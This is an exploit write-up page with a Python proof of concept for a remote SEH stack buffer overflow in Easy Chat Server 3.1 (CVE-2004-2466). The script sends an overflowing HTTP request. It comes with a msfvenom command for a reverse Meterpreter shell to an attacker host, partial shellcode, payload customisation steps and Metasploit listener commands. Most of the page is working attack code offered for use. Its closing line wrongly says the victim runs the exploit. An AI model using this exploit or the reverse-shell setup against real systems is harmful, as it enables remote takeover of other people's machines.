Easy Chat Server 3.1 SEH Exploit

Published on June 19, 2025

This proof-of-concept demonstrates a remote stack buffer overflow via SEH overwrite in Easy Chat Server 3.1, spawning a reverse Meterpreter shell. We’ll walk through the exploit code, how the payload is customized, and how to set up your listener.

POC Exploit Code


# Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
# Exploit Author: r00tpgp @ http://www.r00tpgp.com
# Usage: python easychat-exploit.py <victim-ip> <port>
# Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990
# CVE: CVE-2004-2466
# Installer: http://www.echatserver.com/
# Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000)

#!/usr/bin/python3

import sys
import socket
from struct import pack

host = sys.argv[1]  # Victim IP
port = int(sys.argv[2])  # Victim Port

junk = b"A" * 217
nseh = pack("<L", 0x06eb9090)  # short jump 6 bytes
seh  = pack("<L", 0x1001ae86)  # pop pop ret from SSLEAY32.DLL

# shellcode generated with msfvenom:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 \
#           -f python -b "\x00\x20" -v shellcode
shellcode = b"\x90" * 16
shellcode += b"\xdb\xc9\xbd\x60\xe7\xba\x69\xd9\x74\x24\xf4"
# … [rest of shellcode truncated for brevity] …

buffer = (
    b"GET /chat.ghp?username=" + junk + nseh + seh + shellcode +
    b"&password=&room=1&sex=1 HTTP/1.1\r\n"
    b"User-Agent: Mozilla/4.0\r\n"
    b"Host: " + host.encode() + b":" + str(port).encode() + b"\r\n"
    b"Accept-Language: en-us\r\n"
    b"Connection: Keep-Alive\r\n\r\n"
)

print("[*] Sending evil buffer...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(buffer)
s.close()
print("[+] Done!")

Payload Customization

The shellcode above is generated by msfvenom for a windows/meterpreter/reverse_tcp payload. To adapt it:

  • Change LHOST to your attack VM’s IP (e.g., 192.168.0.162).
  • Change LPORT to your chosen listener port (e.g., 1990).
  • Avoid bad characters \x00 and \x20 to prevent payload truncation.
  • Adjust the junk, nseh, and seh offsets only if targeting a different version or build.

Setting Up the Listener

Use Metasploit’s multi/handler to catch your reverse Meterpreter shell: 


msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.162
set LPORT 1990
exploit

Once the victim runs the exploit, you’ll see a Meterpreter session open.

Linked Articles